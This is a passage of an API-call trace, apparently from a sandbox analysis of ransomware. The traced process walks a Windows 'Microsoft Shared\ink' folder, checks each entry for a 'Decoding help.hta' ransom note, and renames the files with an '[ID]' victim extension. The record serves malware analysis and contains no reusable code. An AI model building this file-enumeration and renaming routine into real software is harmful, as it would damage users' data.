ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bf05363, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tabskb.dll", cAlternateFileName="")) returned 1 [0057.104] lstrcpyW (in: lpString1=0x24a0e030, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0057.105] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0057.105] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0057.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0057.105] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tabskb.dll") returned -1 [0057.105] lstrlenW (lpString="tabskb.dll") returned 10 [0057.105] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0057.105] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0057.105] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="tabskb.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" [0057.105] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" [0057.105] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.105] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.105] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c03bb8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x45c03bb8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf8825d20, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabTip.exe", cAlternateFileName="")) returned 1 [0057.105] lstrcpyW (in: lpString1=0x24a0e030, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0057.105] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0057.105] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0057.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0057.106] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TabTip.exe") returned -1 [0057.106] lstrlenW (lpString="TabTip.exe") returned 10 [0057.106] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0057.106] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0057.106] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="TabTip.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe" [0057.106] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe" [0057.106] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0057.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.031] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th-TH", cAlternateFileName="")) returned 1 [0059.031] lstrcmpW (lpString1=".", lpString2="th-TH") returned -1 [0059.032] lstrcmpW (lpString1="..", lpString2="th-TH") returned -1 [0059.032] lstrcmpiW (lpString1="windows", lpString2="th-TH") returned 1 [0059.032] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.032] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.032] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="th-TH" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH" [0059.032] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*.*" [0059.032] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0059.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9310048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8b8 [0059.034] CloseHandle (hObject=0x8b8) returned 1 [0059.034] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41bbeec8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x41bbeec8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44c363f0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipBand.dll", cAlternateFileName="")) returned 1 [0059.034] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.034] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.034] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0059.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0059.035] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TipBand.dll") returned -1 [0059.035] lstrlenW (lpString="TipBand.dll") returned 11 [0059.035] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.035] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.035] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="TipBand.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" [0059.035] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" [0059.035] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipband.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipband.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.381] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d6a2945, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5d6a2945, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0059.381] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.381] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.381] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0059.381] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0059.381] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TipRes.dll") returned -1 [0059.381] lstrlenW (lpString="TipRes.dll") returned 10 [0059.381] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.381] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.381] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="TipRes.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" [0059.381] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" [0059.381] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.381] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7038f2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x3d7038f2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll", cAlternateFileName="")) returned 1 [0059.381] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.381] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.381] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0059.381] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0059.382] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll") returned -1 [0059.382] lstrlenW (lpString="tipresx.dll") returned 11 [0059.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.382] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="tipresx.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" [0059.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" [0059.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.382] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa125f634, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa125f634, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa1285794, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x130600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipskins.dll", cAlternateFileName="")) returned 1 [0059.382] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.382] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0059.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0059.382] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipskins.dll") returned -1 [0059.382] lstrlenW (lpString="tipskins.dll") returned 12 [0059.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.382] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="tipskins.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll" [0059.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll" [0059.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.383] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1213373, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa1213373, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa12394d3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7ae00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0059.383] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.383] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.383] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0059.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0059.383] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tiptsf.dll") returned -1 [0059.383] lstrlenW (lpString="tiptsf.dll") returned 10 [0059.383] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.383] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.383] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="tiptsf.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" [0059.383] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" [0059.383] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.383] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3dda83b, ftCreationTime.dwHighDateTime=0x1cb892b, 